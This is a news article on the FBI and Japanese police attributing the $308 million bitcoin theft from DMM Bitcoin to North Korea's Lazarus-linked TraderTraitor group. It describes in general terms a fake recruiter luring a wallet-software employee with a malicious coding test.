North Korean hackers linked to hack of 4,500 bitcoins from Japanese crypto exchange

North Korean hackers linked to the infamous Lazarus hacking group have been identified as being behind the theft of more than 4,500 bitcoins from Japanese cryptocurrency exchange DMM Bitcoin earlier this year.

The Federal Bureau of Investigation, in conjunction with the Department of Defense Cyber Crime Center and National Police Agency of Japan, has revealed that hackers who go by the name of TraderTraitor, an arm of Lazarus, successfully stole the equivalent of $308 million from GMM in May and have detailed how the North Korean hackers did so.

The investigation into the hack found that in late March 2024, a North Korean cyber actor pretending to be a recruiter on LinkedIn contacted an employee at Ginco, a Japanese enterprise cryptocurrency wallet software company. The threat actor sent the target, who maintained access to Ginco’s wallet management system, a URL linked to a malicious Python script under the guise of a pre-employment test located on a GitHub page. The victim copied the Python code to their personal GitHub page and was subsequently compromised.

With the access gained, the TraderTraitor hackers sat patiently, waiting until May to exploit their access. To steal the bitcoin, the actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system. With this access, it’s believed that the hackers then manipulated a legitimate transaction request from a DMM employee, resulting in the theft of 4,502.9 bitcoin.

The stolen bitcoin was subsequently transferred to TraderTraitor-controlled wallets, which ultimately lead back to the North Korean government.

“The FBI, National Police Agency of Japan and other U.S. government and international partners will continue to expose and combat North Korea’s use of illicit activities—including cybercrime and cryptocurrency theft—to generate revenue for the regime,” the FBI noted in a statement.

The involvement of both North Korea and an arm of Lazarus in the hack comes as no surprise, as the hack of DMM isn’t the first time Lazarus has targeted cryptocurrency exchanges and it won’t be the last.

In 2022, Lazarus was linked to the hack on the Ronin Network that led to the theft of $615 million in cryptocurrency, and more recently, in July, the group was linked to the theft of $234.9 million in cryptocurrency from India-based cryptocurrency exchange WazirX.

Image: SiliconANGLE/Ideogram

Your vote of support is important to us and it helps us keep the content FREE.

One click below supports our mission to provide free, deep, and relevant content.  

Join our community on YouTube

Join the community that includes more than 15,000 #CubeAlumni experts, including Amazon.com CEO Andy Jassy, Dell Technologies founder and CEO Michael Dell, Intel CEO Pat Gelsinger, and many more luminaries and experts.

“TheCUBE is an important partner to the industry. You guys really are a part of our events and we really appreciate you coming and I know people appreciate the content you create as well” – Andy Jassy

THANK YOU

Related Content

11 Best Beard Trimmers (2024): Full Beards, Hair, Stubble

MIT’s light-activated antiferromagnetic memory could replace today’s ferromagnets

Home for the holidays? Share this top cybersecurity advice with friends and family

Leave a Comment